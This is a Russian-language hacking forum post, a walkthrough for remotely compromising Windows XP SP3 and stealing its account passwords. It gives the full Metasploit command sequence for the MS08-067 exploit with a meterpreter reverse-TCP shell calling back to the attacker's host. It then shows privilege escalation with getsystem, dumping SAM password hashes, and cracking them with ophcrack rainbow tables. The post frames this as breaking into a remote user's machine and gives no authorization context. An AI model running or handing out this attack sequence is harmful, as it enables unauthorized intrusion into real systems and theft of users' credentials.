Ответ
 
LinkBack Опции темы
Старый 03.03.2012, 10:57      #1 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию Metasploit. Ophcrack. Взлом Windows XP (удаленный взлом пароля)

Всем привет!

Давайте сегодня поговорим про взлом Windows XP SP3. Не думайте, что тема про взлом Windows XP уже не актуальна! Еще как актуальна, до сих пор доля на рынке операционных систем Windows XP занимает лидирующие позиции, что позволяет использовать многочисленные эксплоиты. Я остановился на популярном эксплоите MS08_067, о котором вы можете прочитать здесь. Про статистику и долю на рынке ОС вы можете прочитать здесь или воспользуйтесь поиском.

Итак, приступим!

Для начала обновим Metasploit:

Код:
# msfupdate

Запускаем Metasploit:

Код:
# msfconsole

Вводим команды:

Код:
> use windows/smb/ms08_067_netapi
> set rhost 192.168.1.4
> set rport 445
> set lhost 192.168.1.5
> set lport 4444
> set payload windows/meterpreter/reverse_tcp
  • rhost – IP-адрес удаленного пользователя (remote host)
  • rport – порт удаленного пользователя (remote port)
  • lhost – IP-адрес атакующего (local host)
  • lport – порт атакующего (local port)

Проверяем все ли опции заданы:

Код:
> show options

Убеждаемся, что все в порядке.

Click the image to open in full size.

Теперь запускаем эксплоит:

Код:
> exploit

Click the image to open in full size.

Отлично! Мы в системе.

Посмотрим, какими правами мы обладаем, но скорее всего у нас будут права SYSTEM:

Код:
meterpreter > getuid
Server username: NT AUTHORITY/SYSTEM

Иногда бывает, что у атакующего не хватает прав на совершение какого то действия, т.е. он работает под ограниченной учетной записью. И соответственно вылетают такие ошибки, как:

Код:
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Мы можем попробовать поднять наши права в системе командой getsystem:

Код:
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY/SYSTEM

Это было небольшое отступление, идем дальше.

Хорошо, теперь можем делать все что вздумается, но так как мы говорим про удаленный взлом пароля Windows XP, то будем придерживаться плана.

Сейчас нам нужно вывести содержимое базы данных SAM. Для этого воспользуемся командой hashdump:

Код:
meterpreter > hashdump
Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
HelpAssistant:1000:635e6894ad2400afc97d6c747dc0976a:c489103aa4919d38017486860a7e0b2d:::
Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a6f7ec01c389c27cb4db76b7b0de220:::
Гость:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Синтаксис вывода такой: <User_Name>:<User_ID>:<LM Hash>:<NT Hash>:::

Чтобы расшифровать хэшы можно воспользоваться многочисленными онлайн сервисами, например cmd5.ru. Но я решил убить двух зайцев сразу, поэтому сейчас покажу вам, как это сделать с помощью программы ophcrack.

Запускаем ophcrack:

Код:
# ophcrack

Click the image to open in full size.

Теперь нам необходимо скачать rainbow tables к ней, поэтому переходим по этой ссылке и скачиваем архив под названием “XP free small (380MB)“. Для наших экспериментов понадобится только он, но вы можете скачать все, дело ваше. Сохраняем архив с rainbow tables в систему, потом извлекаем. Как разархивировать zip архив в Linux можно прочитать здесь.

Переходим в ophcrack и нажимаем кнопку Tables. В появившемся окне выбираем XP free small, потом нажимаем Install и выбираем директорию с rainbow таблицами. Я разархивировал их в /root/tables/.

Click the image to open in full size.

Когда rainbow таблицы выбраны, нажимаем на кнопку Load и выбираем пункт Single hash. Перед вами появится окно (см. рисунок ниже), в котором вводим интересующую вас строку вывода команды hashdump. Я выбрал вот эти строки:
  • Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7e aee8fb117ad06bdd830b7586c:::
  • Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bd b5fdc5e9cba88547376818d4:::

Нажимаем кнопку OK.

Click the image to open in full size.

Осталось щелкнуть по кнопке Crack и пароли будут получены.

Click the image to open in full size.

Вот и все! Как всегда ничего сложного. Дальше будет еще интереснее, поэтому оформляйте подписку по E-MAIL или RSS, чтобы следить за выходом новых статей.

Дополнительные материалы:
Источник: www.levinkv.ru
levinkv вне форума   Ответить с цитированием
Ответ

Социальные закладки

Метки
exploit, metasploit, meterpreter, ms08_067_netapi

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks Вкл.
Pingbacks Вкл.
Refbacks Вкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Metasploit. Взлом Windows 7 (подсматриваем через web-камеру) levinkv Лаборатория Хакера 8 14.03.2012 03:06
BackTrack 5 - Сброс пароля Администратора Windows levinkv Лаборатория Хакера 10 14.03.2012 03:04
Взлом Wi-Fi WPA2-PSK dqod Лаборатория Хакера 9 19.02.2012 17:21
Взлом KAV 2012 Alb Лаборатория Хакера 0 27.11.2011 16:22
Взлом домофонов Mr.Alex Лаборатория Хакера 13 08.06.2011 01:31


Реламный блок
 

Текущее время: 05:21. Часовой пояс GMT +6.


Rambler's Top100 Счётчик тиц

vBulletin Skin by MiraMaX166
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot
Время генерации страницы 0.14171 секунды с 18 запросами